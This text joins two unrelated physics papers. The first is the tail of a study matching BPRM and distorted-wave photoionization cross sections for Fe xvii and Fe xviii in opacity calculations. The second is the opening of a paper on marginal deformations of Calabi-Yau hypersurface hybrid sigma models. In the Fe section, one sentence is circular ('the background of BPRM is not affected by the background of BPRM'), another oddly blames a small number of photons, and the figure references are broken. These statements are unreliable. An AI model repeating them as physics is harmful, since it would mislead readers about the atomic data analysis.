Fe xvii and Fe xviii The process is justified since level identification of near-degenerate BPRM levels may not exactly correspond in energy from different atomic structure codes such as FAC, since spectroscopic designations depend on CI included and coupling schemes employed for the (e + ion) system1. Footnote 1: All BPRM photoionization cross sections include a small region below the lowest ionization threshold for each level [12], where no RDW data are shown. In table 2, we can see the energy levels computed in BPRM and RDW agree quite well. For Fe xvii, levels 13 and 14, and levels 15 and 16 lie very close to each other, and in figure 3, levels 13 and 16 achieve good agreement, while levels 14 and 15 don't. So we switch the order of levels 14 and 15 in RDW calculation and recompare with good agreement. Thus levels 13 - 16 in BPRM calculation are matched with those in RDW calculation. The same procedure is applied to levels 65 and 66 of Fe xviii in table 2, and the result is show in figure 3. In figures 2 and 3, we show two sets of RDW calculation as described above, and study the effect of configuration interaction on photoionization cross sections, with the upper panel of figure 2 as an example. The dominant configuration of the bound state after being matched with RDW is \(2s^{2}2p^{5}4d\), so with only the same-\(n\)-complex CI of core configurations considered, the transitions can only happen to core configurations \(2s^{2}2p^{5}\), \(2s2p^{5}4\ell\), \(2s^{2}2p^{4}4\ell\) and \(2p^{6}4\ell\), where \(\ell=s,p,d\), while with different-\(n\)-complex CI of core configurations additional contribution can be from all other core configurations. From the upper panel of figure 2 we can see that the same-\(n\)-complex configuration interaction gives reasonably good background, though with some big gaps, while different-\(n\)-complex CI fills up the big gap and improves the background significantly. Similar phenomenon can be found in the rest of the figures 2 and 3, and there are still some gaps remaining after different-\(n\)-complex CI is allowed3 Footnote 3: In figure 2 and 3, the oscillation in the background of the BPRM data can be eliminated with a larger number of continuum basis functions [13]. ### Bound-free data As BPRM calculations are carried out in the lower part of the whole energy range, they include low-\(n\ell\) core configurations with \(n\leq 4\). We use the RDW method to extend it to higher regions up to 500 \(Ry\) in photoelectron energy, and to include higher-\(n\ell\) core configurations \(n=5,6\). The following part of this section gives detailed description of these aspects. #### 3.2.1 High energy cross sections As shown in figure 2, the RDW data can be matched almost perfectly to background BPRM cross sections. However, we also find there are cases where they don't match well in the right region of energy (see figure 4). In the top panels different-\(n\) CI introduces many transitions, but they are not strong enough to raise to the background of BPRM. In the middle panel of figure 4, different-\(n\) CI introduces many edges at positions where the background of BPRM jumps, and raises \begin{table} \begin{tabular}{|c||c|c|c|} \hline & level index & BPRM & RDW \\ \hline Fe xvii & 12 & -3.670657 & -3.67960 \\ & 13 & -2.873930 & -2.84319 \\ & 14 & -2.868775 & -2.84238 \\ & 15 & -2.842915 & -2.83761 \\ & 16 & -2.835625 & -2.83555 \\ & 17 & -2.774853 & -2.77998 \\ \hline & level index & BPRM & RDW \\ \hline Fe xviii & 64 & -1.275887 & -1.27703 \\ & 65 & -1.234865 & -1.24175 \\ & 66 & -1.226084 & -1.23724 \\ & 67 & -1.136909 & -1.14691 \\ \hline \end{tabular} \end{table} Table 2: Selected levels of Fe xvii (\(J=3,\pi=1\)) and Fe xviii (\(J=1/2,\pi=1\)) to be matched (Note: the energy is \(z\)-scaled, and in unit of \(10^{-2}Ry\)) the background higher than BPRM. While in the middle panel of figure 4, around \(105Ry\), compared with same-\(n\) CI, different-n CI moves the background up on the left side, and down on the right side, i.e. converging to the background of BPRM. As close-coupling approximation treats CI more completely and accurately, we multiply the RDW data in the higher energy region by a factor which is the ratio of BPRM value and RDW value at the last point of BPRM calculation for each level (see figure 5), to account for the discrepancy between BPRM and RDW. In figure 5, the distribution of the factors applied in the higher region is very alike for Fe xvii and Fe xviii, and there are around 60% of the bound levels lying around ratio = 1. Among the high-ratio cases, some are caused by the oscillation of the background of BPRM, which is due to the small number of photons in the spectrum. The difference between the BPRM and RDW values is due to the fact that the background of BPRM is not affected by the background of BPRM. Figure 2: Most of the levels are matched at the first attempt with excellent consistency in photoionization cross section. The configuration is attached with each level. BPRM (black), RDW(blue and red). “Same-n CI” means only same-n-complex CI is considered for core configurations, and “different-n CI” refers to both same-n- and different-n-complex CI is considered. Figure 3: Multiple attempts are needed to ensure the correct matching when the levels are found with discrepancy in the photoionization cross section. In?? and?? the discrepancy is shown in upper panel and the final matching is in the lower one. Find the configuration attached for each level. BPRM (black), RDW(blue and red). “Same-n CI” refers to only same-n-complex CI is considered for core configurations, and “different-n CI” refers to both same-n- and different-n-complex CI are considered. of continuum basis functions used in the wavefunction expansion [13] (see the bottom panels of figure 4. The energy mesh used in the region is created in such a way that 10 points are uniformly assigned between any adjacent ionization thresholds due to the other core configurations (see section 3.2.2). #### 3.2.2 Highly excited core configurations Using RDW with different-n-complex CI, we calculate photoionization cross section due to other core configurations up to \(n=6\) that are not included in the BPRM calculation. To top-up 218CC BPRM for Fe xvii, we include core configurations \(2s^{2}2p^{4}4f\), \(2s2p^{5}4f\), \(2p^{6}4\ell^{\prime}\), \(2s^{S}2p^{P}5\ell^{\prime\prime}\) and \(2s^{S}2p^{P}6\ell^{\prime\prime\prime}\), where \(\ell^{\prime},\ell^{\prime\prime},\ell^{\prime\prime\prime}\) are all possible subshells in the corresponding shell, and \(s\), \(p\) are any possible non-negative integers satisfying \(S+P=6\). To top-up 276CC BPRM for Fe xviii, we include core configurations \(2p^{5}3\ell^{\prime}\), \(2s^{2}2p^{3}4f\), \(2s2p^{4}4\ell^{\prime}\), \(2p^{5}4\ell^{\prime\prime}\), \(2s^{S}2p^{P}5\ell^{\prime\prime\prime}\) and \(2s^{S}2p^{P}6\ell^{\prime\prime\prime\prime}\), where \(\ell^{\prime},\ell^{\prime\prime},\ell^{\prime\prime\prime}\) and \(\ell^{\prime\prime\prime\prime}\) are all possible subshells in the corresponding shell, and \(S\), \(P\) are any possible non-negative integers satisfying \(S+P=5\). The energy mesh is same as the one used in BPRM calculation merged with the one in the high energy region as described in section 3.2. As shown in figure 6, the BPRM data is merged with the scaled RDW tail, and the contribute from other core configurations varies from negligible to noticeable. #### 3.2.3 Highly excited bound levels In RDW, we consider all the bound state levels with \(n\leq 10\), so we collect all such levels that are not included in BPRM calculation, and calculate the photoionization cross section due to all core configurations, i.e. the core configurations included in the BPRM calculation and the other ones displayed in section 3.2.2, with different-n-complex CI. ### Bound-bound data To top-up the bound-bound oscillator strength, we divide it into two parts. One is from bound states to pure bound states. i.e. between negative energy levels. We calculate all such possible transitions, but only collect the ones that are not calculated in BPRM calculations. The other part is from bound states to quasi-bound states, i.e. from negative energy bound levels to positive energy doubly excited states in the continuum. BPRM calculations treat direct photoionization and autoionization as a single unified quantum-mechanical process, as in section 3.2 that discusses direct photoionization is done. To simulate autoionizing resonances, we calculate the oscillator strengths from bound to doubly excited states, among all pairs of negative-positive energies. We consider transitions that excite an electron from \(L\)-shell to a higher one, forming a doubly excited configuration that can not be formed by combining a core configuration used in BPRM calculations with another electron. Take Fe xviii for an example, we consider transitions from \(2s^{S}2p^{P}3\ell\) to only \(2p^{5}3\ell^{\prime}n\ell^{\prime\prime}\), where \(S\), \(P\) are any possible non-negative integers satisfying \(S+P=6\), and \(\ell\), \(\ell^{\prime}\), \(\ell^{\prime\prime}\) can be any sub-shell in the corresponding Figure 4: Different-n CI improves the background significantly, but there is still very large discrepancy in the right region of energy for some levels. BPRM (black), RDW(blue and red). “Same-\(n\) CI” refers to only same-n-complex configuration interaction is considered for core configurations, and “different-\(n\) CI” refers to both same-\(n\)- and different-\(n\)-complex configuration interaction are considered. shell, and \(n=3-6\). Since \(2s^{2}2p^{3}\) and \(2s2p^{4}\) are included in 276CC BPRM calculation, \(2s^{2}2p^{3}3\ell^{\prime}n\ell^{\prime\prime}\) and \(2s2p^{4}3\ell^{\prime}n\ell^{\prime\prime}\) are considered naturally. Thus they are excluded in the top-up calculations. The number of quasibound positive energy levels in the continuum is far larger than bound negative energy levels. For Fe xvii we have 587 bound levels as opposed to \(\sim\)72,000 positive energy levels included as top-up. For Fe xviii we obtain 1,154 bound levels vs. \(\sim\)175,000 quasibound levels. All possible oscillator strengths among these large number of levels are computed and considered in opacities calculations4. Footnote 4: We also note that oscillator strength data for transitions among quasibound positive energy levels are employed for free-free contribution to plasma broadening of autoionizing resonances, discussed in paper RMOP3 ## 4 Conclusion In order to investigate the effect of convergence and completeness of RMOP data for opacities calculations, complete sets of relativistic distorted wave calculations are carried out for Fe xvii and Fe xviii to compare with and topup the 218CC and 276CC BPRM calculations, respectively. Bound state levels are matched between BPRM and RDW calculation by comparing quantum numbers \(J\), \(\pi\), energy, and cross sections. With such Figure 5: The distribution of the factors multiplied to RDW data in the higher energy region for Fe xvii and Fe xviii. “width” is the width of the bins. Figure 6: The photoionization cross section of the same four levels as in figure 2 are extended to higher energy region and the contribution from other core configurations level correspondence, BPRM photoionization cross sections in the higher energy region are extended by scaled RDW data, and contribution from other core configurations up to \(n=6\) is added, to examine the effect of convergence over and above the \(n\leq 4\) BPRM data. Higher bound state levels are also included with photoionization cross sections due to all core configurations up to \(n=6\). Oscillator strength data corresponding to the additional levels are also topped-up, with contribution from bound-bound and bound-quasibound transitions. The effects of CI on photoionization cross sections are discussed, including same-\(n\)-complex and different-\(n\)-complexes, showing its significant role in reproducing the background of BPRM cross sections using RDW. However, the extensive resonance structures that dominate BPRM photoionization cross sections throughout the energy range considered can not be compared owing to their absence in the RDW data. Nevertheless, the RDW method may provide useful checks on completeness and convergence of CC-BPRM results. We have extensively studied the correspondence and complementarity between BPRM and RDW results with a view to ascertain possible impact on opacities. However, the local-thermodynamic-equilibrium (LTE) Mihalas-Hummer-Dappen equation-of-state valid in stellar interiors yields extremely small occupation probabilities and level populations for the high energy and high (e + ion) spin-angular momenta states \(nSLJ\) (discussed in paper P1), implying that the actual effect on opacities would be small. Indeed, preliminary opacities calculations indicate that Rosseland Mean Opacities are enhanced by only a few percent \(<\)5% (results to be reported elsewhere). ## 5 Acknowledgments One of the authors (ZL) would like to thank Dr. Ming Feng Gu for helpful advice in using FAC and thank the following colleagues for helping run the BPRM calculation with their resources in ASC Unity cluster at the Ohio State University (names in alphabetic order): Jiaxin wu, Keng Yuan Meng, Max Westphal, Xiankun Li, Yonas Getachew and Zhefu yu. This research was supported by a teaching assistantship from the Dept. of Physics and the Dept. of Astronomy of Ohio State University (OSU) and by the US National Science Foundation and Dept. of Energy. Computations were carried out at the Ohio Supercomputer Center, the OSU Dept. of Astronomy and the ASC Unity cluster of OSU.
2305.05971
Marginal deformations of Calabi-Yau hypersurface hybrids with (2,2) supersymmetry
We study two-dimensional non-linear sigma models with (2,2) supersymmetry and a holomorphic superpotential that are believed to flow to unitary compact (2,2) superconformal theories with equal left and right central charges c=9. The SCFTs have a set of marginal deformations, and some of these can be realized as deformations of parameters of the UV theory, making it possible to apply techniques such as localization to probe the deformations of the SCFT in terms of a UV Lagrangian. In this work we describe the UV lifts of the remaining SCFT infinitesimal deformations, the so-called non-toric and non-polynomial deformations. Our UV theories naturally arise as geometric phases of gauged linear sigma models, and it may be possible to extend our results to find lifts of all SCFT deformations to the gauged linear sigma model.
Griffen Adams, Ilarion V. Melnikov
2023-05-10T08:29:09Z
http://arxiv.org/abs/2305.05971v1
# Marginal deformations of Calabi-Yau hypersurface hybrids with (2,2) supersymmetry ###### Abstract We study two-dimensional non-linear sigma models with (2,2) supersymmetry and a holomorphic superpotential that are believed to flow to unitary compact (2,2) superconformal theories with central charges \(c_{\mbox{\tiny L}}=c_{\mbox{\tiny R}}=9\). The SCFTs have a set of marginal deformations, and some of these can be realized as deformations of parameters of the UV theory, making it possible to apply techniques such as localization to probe the deformations of the SCFT in terms of a UV Lagrangian. In this work we describe the UV lifts of the remaining SCFT infinitesimal deformations, the so-called non-toric and non-polynomial deformations. Our UV theories naturally arise as geometric phases of gauged linear sigma models, and it may be possible to extend our results to find lifts of all SCFT deformations to the gauged linear sigma model. ###### Contents * 1 Introduction * 2 Warm up: deformations of Calabi-Yau non-linear sigma models * 2.1 Superspace conventions * 2.2 The action and its key symmetries * 2.3 A view of Calabi-Yau deformations * 2.4 A chiral algebra perspective * 3 Hypersurface geometry * 3.1 A little toric geometry * 3.2 Complex structure deformations * 3.3 Complexified Kahler deformations * 4 Marginal operators in the hypersurface hybrid * 4.1 The Lagrangian of the hypersurface hybrid * 4.2 The toric (a,c) deformations * 4.3 The non-toric (a,c) deformations * 4.4 The polynomial deformations * 4.5 The non-polynomial deformations * 5 The NS-R sector of the hypersurface hybrid * 5.1 (a,c) Deformations * 5.2 (c,c) Deformations * 6 Further directions ## 1 Introduction Calabi-Yau compactification plays a central role in the study of string theory in all of its guises and duality frames. One of the oldest of these is the realization that compact Calabi-Yau manifolds have an intimate relation to non-trivial two-dimensional superconformal theories (SCFTs) with (2,2) supersymmetry. Indeed, there is a well-motivated conjecture that given a compact smooth Calabi-Yau manifold \(X\), the (2,2) supersymmetric non-linear sigma model with target space \(X\) can be endowed with a smooth Kahler metric \(g\) and a closed Kalb-Ramond field \(B\) such that the resulting theory is superconformal. More precisely, it is believed that for a fixed choice of complex structure and complexified Kahler class there is a unique Kahler metric \(g\) compatible with these structures such that the non-linear sigma model with target space \(X\) and metric \(g\) is a superconformal field theory [1]. Furthermore, when the volume of \(X\) is taken to be large in string units the metric on \(g\) approaches the unique Ricci-flat Calabi-Yau metric for the fixed complex structure and Kahler class. These familiar notions are of course textbook material [2] discussed in detail in many classic reviews such as [3; 4]. Except at special points in the moduli space, the SCFTs obtained in this way are not solvable, and this is both the challenge and the appeal of the construction. To probe the physics of the putative SCFT a number of powerful methods have been devised. Many of these approaches are unified via (2,2) gauged linear sigma models introduced in this context in [5]: for an appropriate choice of parameters these two-dimensional gauge theories are believed to flow to the same SCFT as given by the non-linear sigma model with target space \(X\), where \(X\) is realized as a complete intersection in a toric (or, in the non-abelian case, a Grassmannian or closely related) variety. Techniques based on topological field theory and localization can then be used to probe the strongly-coupled IR dynamics described by the SCFT via UV computations based on a Lagrangian gauge theory. A recent review of these constructions was given in [6]. The results based on such computations have had a profound impact on both mathematical physics, primarily through applications to mirror symmetry, as well as on string compactification, but all such applications have an important caveat: they can only be applied to those IR computations that have a simple UV lift. In this work we tackle the simplest but perhaps also the foundational aspect of this problem: typically a UV lift does not describe the full deformation space of the putative superconformal theory. The issue was already clear in the earliest large-scale constructions of such Calabi-Yau manifolds, the so-called "CICY" manifolds obtained as complete intersections in products of projective spaces [7; 8; 9]: in general when \(X\) is obtained as such as space, only a subset of deformations of complex structure is obtained from deformations of the defining polynomial equations. This subset is exactly the set that has a good presentation in a corresponding linear sigma model, and we are then faced with a general question: can we describe the remaining deformations in terms of the fields of the UV theory? We will describe a solution to this problem relevant to another large class of Calabi-Yau compactifications: hypersurfaces in toric varieties. These manifolds were introduced by Batyrev in the context of mirror symmetry [10] and subsequently generalized to complete intersections in toric varieties [11]. These models have a simple gauged linear sigma model presentation [12], and their moduli spaces give a precise distinction between those moduli with a simple UV lift, and those that do not have such a lift. Explicitly, the moduli space of the SCFT is locally a product of two special Kahler manifolds \(\mathcal{M}^{\rm ac}\times\mathcal{M}^{\rm cc}\), with the first factor describing the complexified Kahler deformations associated to the (a,c) ring of the SCFT, while the second factor describes the complex structure deformations associated to the (c,c) ring of the SCFT. There is then a canonical identification between the tangent spaces to these with cohomology groups on \(X\): \[T_{\mathcal{M}^{\rm ac}} \simeq H^{1}(X,\Omega^{1}_{X})\, T_{\mathcal{M}^{\rm cc}} \simeq H^{1}(X,T_{X}). \tag{1}\] Here \(T_{X}\) is the (holomorphic) tangent sheaf on \(X\), while \(\Omega^{1}_{X}\) is its dual, which can also be thought of as the sheaf of (1,0)-forms on \(X\). The dimensions of the spaces are then given by \[\dim\mathcal{M}^{\rm ac} =h^{1}(X,\Omega^{1}_{X})=h^{1,1}(X)\, \dim\mathcal{M}^{\rm ac} =h^{1}(X,T_{X})=h^{1,2}(X). \tag{2}\] Furthermore, there is a decomposition [10; 13], nicely reviewed in [14], \[h^{1,1}(X) =h^{1,1}_{\rm toric}(X)+h^{1,1}_{\rm non-toric}(X)\, h^{1,2}(X) =h^{1,2}_{\rm poly}(X)+h^{1,2}_{\rm non-poly}(X). \tag{3}\] The first term in each equation has a straightforward interpretation in the gauged linear sigma model: each "toric" deformation can be understood as a deformation of the complexified Fayet-Iliopoulos parameters encoded in the twisted chiral superpotential, while each polynomial deformation can be understood as a deformation of the chiral superpotential determined by the defining equation of the hypersurface. In (2,2) SCFTs the decompositions turn out to be mirror-symmetric, i.e. mirror symmetry exchanges the toric deformations of the original theory with the polynomial deformations of the mirror.1 On the other hand, the remaining deformations do not have a simple UV description. Footnote 1: This is not preserved by (0,2) marginal supersymmetric deformations [15; 16]. There are several ways to address this issue. The most pragmatic is simply to stick to examples where the non-toric and non-polynomial deformations are absent. This is for example done in the CICY literature by restricting to what are termed "favorable" configurations. On the other hand, if one's interest is in a particular \(X\), then one may try to find a more general construction that presents \(X\) as a complete intersection in some other variety where the analogues of the non-toric and non-polynomial deformations are absent. An early approach of this sort was made in [17]; the more recent construction of "generalized CICYs" [18] offers another set of promising candidates for finding such generalizations. However in general it is not obvious how to construct such a desired UV theory given a particular \(X\). In addition, there is an important question of principle. Given an RG flow from a (2,2) UV theory to the SCFT we can ask whether it is possible to describe marginal operators in the SCFT in terms of operators constructed from the UV fields based on a classical Lagrangian. We know that in general this is too much to ask: for example, a classical field theorist equipped with the Lagrangian of a compact boson will be hard-pressed to discover the marginal operators that exist at the self-dual radius! However, we can hope that the situation is under better control when the flow leads to a weakly-coupled large radius non-linear sigma model with target space \(X\), and we will see our hope borne out, so that we will be able to present candidate operators in the chiral algebra of a UV theory that describe the full set of marginal deformations of the IR SCFT. We term the UV theory we study a "hypersurface hybrid theory."2 Such a theory arises as a phase in the gauged linear sigma model for a hypersurface \(X\) in a toric variety \(V\), and it can be formally obtained by taking the linear sigma model deep in a geometric phase and sending the gauge coupling to infinity while keeping the chiral superpotential couplings finite. The result is a non-linear sigma model with target space \(Y\), the total space of the canonical bundle \({\cal O}_{V}(K_{V})\to V\) equipped with a chiral superpotential \({\cal W}=\Phi P\), where \(\Phi\) is the distinguished fiber coordinate, and \(P\) is a section of the anticanonical bundle \({\cal O}_{V}(-K_{V})\to V\) chosen to be suitably generic so that \(X=\{P=0\}\subset V\) is a smooth manifold. We can think of this theory as an example of a hybrid theory, such as those introduced in [22] and recently studied in a number of works including [23]. A generic hybrid theory is constructed as a fibration of a (2,2) Landau-Ginzburg theory over a suitable base manifold \(V\), where the Landau-Ginzburg fields are sections of certain vector bundles over \(V\), while the Landau-Ginzburg superpotential varies holomorphically over the base. Our theory is a special and rather degenerate case, where the Landau-Ginzburg potential is linear in the fiber field. This means, for example, that we cannot think of the theory as a fibration of a _supersymmetric_ Landau-Ginzburg model on a curved base. A related property is that the introduction of the superpotential term decreases the value of the central charge, while in the hybrid theories considered in [22] the Landau-Ginzburg degrees of freedom made a non-negative contribution to the central charge. Nevertheless, we will see that much of the technology developed in [22] continues to apply in this case and gives a computable framework, in particular for the Ramond sector of the theory. Footnote 2: In some literature—for example [19; 20; 21]—these theories are referred to as Landau-Ginzburg models. We choose not to use that terminology to emphasize the significant differences between a Landau-Ginzburg theory and a curved non-linear sigma model. Our central result is to find explicit representatives for non-toric and non-polynomial deformations of the SCFT in the chiral algebra of the theory: the cohomology of the right-moving supercharge, or, in a superfield formulation, the cohomology of the super-covariant derivative \(\overline{\cal D}\), which we denote by \({\cal H}_{\overline{\cal D}}\). Working in the classical UV theory we obtain subspaces \({\cal H}_{\overline{\cal D}}^{\rm ac}\) and \({\cal H}_{\overline{\cal D}}^{\rm cc}\) which we expect to flow to marginal (a,c) and (c,c) operators in the SCFT. While already solving a problem in principle, we primarily view this result as a positive step in providing a similar description of deformations at the level of the gauged linear sigma model. The rest of the note is organized as follows: we introduce some (2,2) superspace notation in section 2 and then apply it to give a large radius description of deformations in a compact Calabi-Yau non-linear sigma model. Next we give a discussion of deformations of a hypersurface \(X\) in \(V\) in terms of algebraic geometry and phrase the non-toric and non-polynomial deformations solely in terms of properties of algebraic geometry of \(V\). Our key results are then obtained in section 4, where we lift these deformations to the hypersurface hybrid based on the non-linear sigma model with target space \(Y\). In section 5 we re-examine the marginal deformations by studying the NS-R sector of the theory via the techniques of [22] and reproduce the results obtained in previous sections. We conclude with a discussion of future directions. IVM's work is supported in part by the Humboldt Research Award as well as the Educational Leave program at James Madison University. Our work on this project was also supported by the NSF Grant PHY-1914505. We thank P. Aspinwall and R. Plesser for useful discussions. IVM acknowledges an ancient collaboration with B. Wurm that attempted to tackle some closely related questions. ## 2 Warm up: deformations of Calabi-Yau non-linear sigma models In this section we set out the notation that we will use in the rest of our note, and we will illustrate the basic ideas in the familiar setting of the chiral algebra of a large radius compact Calabi-Yau manifold. Additional details may be found in, for example, [6; 22]. ### Superspace conventions Our conventions for superspace are those of [6]. We work in Euclidean signature on a flat worldsheet \(\Sigma=\mathbb{C}\) and (2,2) superspace coordinates \((z,\theta^{\prime},\overline{\theta}^{\prime};\overline{z},\theta,\overline{ \theta})\). Using the short-hand notation \(\partial_{z}=\frac{\partial}{\partial z}\) and \(\bar{\partial}_{\overline{z}}=\frac{\partial}{\partial\overline{z}}\), a representation of the right-moving (or anti-holomorphic) supersymmetry algebra is furnished by the antiholomorphic superspace derivatives and supercharge operators \[\mathcal{D} =\partial_{\theta}+\overline{\theta}\bar{\partial}_{\overline{z }}\;, \mathcal{Q} =\partial_{\theta}-\overline{\theta}\bar{\partial}_{\overline{z }}\;,\] \[\overline{\mathcal{D}} =\partial_{\overline{\theta}}+\theta\bar{\partial}_{\overline{ z}}\;, \overline{\mathcal{Q}} =\partial_{\overline{\theta}}-\theta\bar{\partial}_{\overline{z }}\;. \tag{1}\] The non-trivial anti-commutators for these are \(\{\mathcal{D},\overline{\mathcal{D}}\}=2\bar{\partial}_{\overline{z}}\) and \(\{\mathcal{Q},\overline{\mathcal{Q}}\}=-2\bar{\partial}_{\overline{z}}\). We also have their "holomorphic" versions \[\mathcal{D}^{\prime} =\partial_{\theta^{\prime}}+\overline{\theta}^{\prime}\partial_ {z}\, \mathcal{Q}^{\prime} =\partial_{\theta^{\prime}}-\overline{\theta}^{\prime}\partial_ {z}\,\] \[\overline{\mathcal{D}}^{\prime} =\partial_{\overline{\theta}^{\prime}}+\theta^{\prime}\partial_ {z}\, \overline{\mathcal{Q}}^{\prime} =\partial_{\overline{\theta}^{\prime}}-\theta^{\prime}\partial_ {z}\, \tag{2}\] which have non-trivial anti-commutators \(\{\mathcal{D}^{\prime},\overline{\mathcal{D}}^{\prime}\}=2\partial_{z}\) and \(\{\mathcal{Q}^{\prime},\overline{\mathcal{Q}}^{\prime}\}=-2\partial_{z}\). We will be working with Lagrangian field theories based on bosonic chiral superfields \(\mathcal{Y}^{\alpha}\), which satisfy the constraints \[\overline{\mathcal{D}}\mathcal{Y}^{\alpha} =0\, \overline{\mathcal{D}}^{\prime}\mathcal{Y}^{\alpha} =0\, \tag{3}\] as well as their anti-chiral charge-conjugates \(\overline{\mathcal{Y}}^{\alpha}\), which are annihilated by \(\mathcal{D}\) and \(\mathcal{D}^{\prime}\). These fields have superspace expansions \[\mathcal{Y}^{\alpha} =y^{\alpha}+\cdots\, \overline{\mathcal{Y}}^{\overline{\alpha}} =\overline{y}^{\overline{\alpha}}+\cdots\, \tag{4}\] and the bosonic fields \(y^{\alpha}(z,\overline{z})\) and \(\overline{y}^{\overline{\alpha}}(z,\overline{z})\) take values in a Kahler manifold \(Y\)--the target space of the non-linear sigma model. Denoting the embedding map as \(f:\Sigma\to Y\), the superfields \(\mathcal{D}\mathcal{Y}^{\alpha}\) and \(\overline{\mathcal{D}\mathcal{Y}}^{\overline{\alpha}}\) have spin \(-1/2\) and take values in pullback bundles \(f^{*}(T_{Y})\) and \(f^{*}(\overline{T}_{Y})\) respectively.3 In what follows we will lighten notation and not write the explicit pullback by the map \(f\). The superfields \(\mathcal{D}^{\prime}\mathcal{Y}^{\alpha}\) and \(\overline{\mathcal{D}}^{\prime}\overline{\mathcal{Y}}^{\overline{\alpha}}\) are valued in the same bundles as their anti-holomorphic counter-parts but carry spin \(+1/2\). This geometric structure allows us to formulate the action and path integral of the non-linear sigma model. Given a cover \(\{\mathfrak{U}_{a}\}_{a\in I}\) of \(Y\) with holomorphic transition functions relating the coordinates in overlapping patches \(\mathfrak{U}_{a}\cap\mathfrak{U}_{b}\neq\emptyset\) as \(y^{\alpha}_{a}=F^{\alpha}_{ab}(y_{b})\), the superfields of the theory transform accordingly: Footnote 3: More precisely, these superfields take values in appropriate pullbacks of the target space tangent bundle \(T_{Y}\) tensored with a spin bundle on the worldsheet. For example, \(\mathcal{D}\mathcal{Y}^{\alpha}\) is a section of \(f^{*}(T_{Y})\otimes\overline{K}^{1/2}_{\Sigma}\). In our case the canonical bundle \(K_{\Sigma}\) and its conjugate \(\overline{K}_{\Sigma}\) are trivial, and so are the spin bundles. The spin bundles play an important role when we place the theory on a curved worldsheet, when we consider topologically non-trivial field configurations, or when we perform a topological twist to obtain a cohomological topological field theory see, e.g. [4, 24]. These subtleties will not play a role in our classical considerations, and we will just keep track of the spin eigenvalues. \[\mathcal{Y}^{\alpha}_{a} =F^{\alpha}_{ab}(\mathcal{Y}_{b})\, \overline{\mathcal{Y}}^{\overline{\alpha}}_{a} =\overline{F}^{\alpha}_{ab}(\mathcal{Y}_{b})\, \tag{5}\] and the superspace derivatives transform covariantly. For example, \[(\mathcal{D}\mathcal{Y}^{\alpha})_{a} =\frac{\partial F^{\alpha}_{ab}}{\partial\mathcal{Y}^{\beta}_{b} }(\mathcal{D}\mathcal{Y}^{\beta})_{b}. \tag{6}\] Note that this implies that the higher order terms in the \(\theta,\theta^{\prime}\) expansion of the superfields pick up connection terms in their transformations. This is a familiar feature of superspace [25, 26]. Before we proceed further we will fix some notation for a holomorphic vector bundle \(\mathcal{E}\) over a Kahler manifold \(Y\) of dimension \(d\). We denote the dual bundle by \(\mathcal{E}^{*}\), and the complex conjugate bundle by \(\overline{\mathcal{E}}\). We denote by \(\mathcal{A}^{p,q}_{Y}(\mathcal{E})\) the vector space of sections of (p,q) forms on \(Y\) valued in \(\mathcal{E}\). The vector space of (p,q) forms on \(Y\) will just be denoted by \(\mathcal{A}^{p,q}_{Y}\). Although we will primarily work in the smooth category, it will be useful for us to think of the bundles as sheaves. We will denote by \(\mathcal{O}_{Y}\) the structure sheaf on \(Y\), \(T_{Y}\) will be the tangent sheaf, and \(\Omega^{p}_{Y}\) the sheaf of \((p,0)\)-forms; of course \(\Omega^{1}_{Y}=T^{*}_{Y}\). \(K_{Y}\) denotes the canonical divisor on \(Y\). For all examples we consider \(K_{Y}\) will be Cartier, so that \(\mathcal{O}_{Y}(K_{Y})\simeq\Omega^{d}_{Y}\) is the canonical bundle. When \(Y\) is compact and smooth we will frequently make use of the isomorphism between Dolbeault and Cech cohomology groups \(H^{p,q}_{\bar{\partial}}(Y,\mathcal{E})\simeq H^{q}(Y,\Omega^{p}_{Y}\otimes \mathcal{E})\). The former naturally show up in the physical theory, while the latter are computationally more accessible. ### The action and its key symmetries To write down an explicit action, we fix a Kahler metric \(\mathcal{G}\) on \(Y\), locally given by a Kahler potential \(\mathcal{K}\). It is also possible to include the coupling to a closed \(B\)-field, but this will not play a role in our classical discussion. If \(Y\) is non-compact and admits a global holomorphic function \(\mathcal{W}(\mathcal{Y})\), then we can also add a chiral superpotential term to the action. Letting \(m\) be a parameter with units of mass, the standard 2-derivative action with a chiral superpotential is \[S=S_{\text{kin}}+S_{\text{pot}}\, \tag{7}\] with \[S_{\text{kin}} =\tfrac{1}{4\pi}\int d^{2}z\underbrace{\mathcal{D}\overline{ \mathcal{D}}\overline{\mathcal{D}}^{\prime}\mathcal{D}^{\prime}}_{=\mathcal{D} _{\text{tot}}}\left[\tfrac{1}{2}\mathcal{K}(\mathcal{Y},\overline{\mathcal{Y} })\right]\, S_{\text{pot}} =\tfrac{m}{4\pi}\int d^{2}z\,\mathcal{D}\mathcal{D}^{\prime} \mathcal{W}(\mathcal{Y})+\text{h.c}. \tag{8}\] It is understood that the Grassmann coordinates \(\theta,\theta^{\prime}\) and their conjugates are to be set to zero after all of the superspace derivatives are taken. While the kinetic term is defined only patch by patch, the action is nevertheless well-defined since Kahler transformations give rise to terms annihilated by the superspace derivatives. Moreover, because the fermion couplings are non-chiral the action and the path integral are invariant under (complex) diffeomorphisms, which allows both to be well-defined despite the curvature of the target space. As we will be mostly concerned with aspects of the classical field theory, the equations motion will play an important role. In superspace these take the form \[\overline{\mathcal{D}}^{\prime}\overline{\mathcal{D}}\overline{ \mathcal{Y}}^{\overline{\beta}} =-\overline{\Gamma}^{\overline{\beta}}_{\overline{\alpha}\overline {\gamma}}\overline{\mathcal{D}}^{\prime}\overline{\mathcal{Y}}^{\overline{ \alpha}}\overline{\mathcal{D}}\overline{\mathcal{Y}}^{\overline{\gamma}}+2m \mathcal{G}^{\overline{\beta}\alpha}\mathcal{W}_{\alpha}\,\] \[\mathcal{D}^{\prime}\mathcal{D}\mathcal{Y}^{\alpha} =-\Gamma^{\alpha}_{\beta\gamma}\mathcal{D}^{\prime}\mathcal{Y}^{ \beta}\mathcal{D}\mathcal{Y}^{\gamma}-2m\overline{\mathcal{W}}_{\overline{ \alpha}}\mathcal{G}^{\overline{\alpha}\alpha}. \tag{9}\] Here \(\mathcal{G}^{\overline{\beta}\alpha}\) denotes the inverse Kahler metric, while \(\Gamma\) and \(\overline{\Gamma}\) are the Chern connections on \(T_{Y}\) and \(\overline{T}_{Y}\) respectively: \[\Gamma^{\alpha}_{\beta\gamma} =\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}_{\beta\overline {\alpha},\gamma}\, \overline{\Gamma}^{\overline{\alpha}}_{\overline{\beta}\overline{ \gamma}} =\mathcal{G}^{\overline{\alpha}\alpha}\mathcal{G}_{\alpha\overline{ \beta},\overline{\gamma}}. \tag{10}\] The notation 